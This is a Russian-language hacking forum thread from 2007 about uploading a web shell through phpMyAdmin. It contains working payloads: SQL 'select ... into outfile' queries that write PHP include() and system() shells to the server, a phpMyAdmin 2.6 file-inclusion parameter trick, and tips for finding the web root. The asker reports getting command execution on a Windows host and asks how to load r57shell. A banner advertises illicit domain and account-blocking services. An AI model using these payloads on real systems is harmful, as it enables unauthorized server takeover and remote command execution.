Форум АНТИЧАТ - Залить ШЕЛЛ через PHPmyadmin

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Залить ШЕЛЛ через PHPmyadmin

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Залить ШЕЛЛ через PHPmyadmin

13.01.2007, 00:00

street16

Познающий

Регистрация: 18.09.2006

Сообщений: 43

Провел на форуме:
468989

Репутация: 3

Залить ШЕЛЛ через PHPmyadmin

Собственно сабж

13.01.2007, 00:03

Abra

Постоянный

Регистрация: 17.09.2005

Сообщений: 375

Провел на форуме:
993362

Репутация: 175

помоему никак.

13.01.2007, 00:14

p-range

Участник форума

Регистрация: 05.02.2006

Сообщений: 168

Провел на форуме:
749524

Репутация: 715

Отправить сообщение для p-range с помощью ICQ

если есть права на запись, выполняй запрос

select '<? include($_GET[sh]); ?>' from table into outfile '/home/user/...';

13.01.2007, 01:27

p-range

Участник форума

Регистрация: 05.02.2006

Сообщений: 168

Провел на форуме:
749524

Репутация: 715

2ettee
а какая разница между моим и твоим постом?

13.01.2007, 01:43

street16

Познающий

Регистрация: 18.09.2006

Сообщений: 43

Провел на форуме:
468989

Репутация: 3

а как узнать /home/site/www/dir/shell.php что именно вместо этого подставлять?

13.01.2007, 01:51

ShAnKaR

Пачка маргарина

Регистрация: 14.07.2005

Сообщений: 964

Провел на форуме:
4646474

Репутация: 1424

Отправить сообщение для ShAnKaR с помощью ICQ

кароче если версия 2.6.* и есть права на запись хоть в тмп, то можно
phpmyadmin/libraries/database_interface.lib.php?cfg[Server][extension]=LOCAL_FILE

Последний раз редактировалось ShAnKaR; 13.01.2007 в 01:54..

13.01.2007, 02:05

street16

Познающий

Регистрация: 18.09.2006

Сообщений: 43

Провел на форуме:
468989

Репутация: 3

phpmyadmin/libraries/database_interface.lib.php нет там такого

версия phpMyAdmin 2.5.7

13.01.2007, 02:13

ShAnKaR

Пачка маргарина

Регистрация: 14.07.2005

Сообщений: 964

Провел на форуме:
4646474

Репутация: 1424

Цитата:

Сообщение от street16

а как узнать /home/site/www/dir/shell.php что именно вместо этого подставлять?

в phpmyadmin довольно много способов узнать локальный путь например попросить какойнить файл который обычно не вызывается на прямую а только инклудится, а потом попробовать select '<? phpinfo(); ?>' into outfile '/path_to_phpmyadmin/shell.php' либо вобще поищи на http://packetstormsecurity.org про phpmyadmin инфу

13.01.2007, 03:01

street16

Познающий

Регистрация: 18.09.2006

Сообщений: 43

Провел на форуме:
468989

Репутация: 3

ок у меня получилось select '<?php system($cmd) ?>' into outfile '/path_to_phpmyadmin/shell.php'
ротом я набрал www.host/phpmyadmin/shell.php?cmd=dir,но там все в нечетабельном виде,как мне напрмер залить r57shell? На сервере стоит винда

Последний раз редактировалось street16; 13.01.2007 в 03:08..

#10

13.01.2007, 04:42

ShAnKaR

Пачка маргарина

Регистрация: 14.07.2005

Сообщений: 964

Провел на форуме:
4646474

Репутация: 1424

в pm

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Залить шелл через http запрос	serg™	Уязвимости	5	05.12.2006 17:27
Как залить шелл через PhpMyAdmin?	Buga	Форумы	15	16.02.2006 22:18
Залить remview.php через phpMyAdmin	Grom	PHP, PERL, MySQL, JavaScript	8	05.02.2006 00:19
залить шелл через ipb 2.0.4	alakazam	Форумы	4	16.11.2005 22:08
Как залить шелл через PhPBB	SheFF	Форумы	5	29.11.2004 01:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход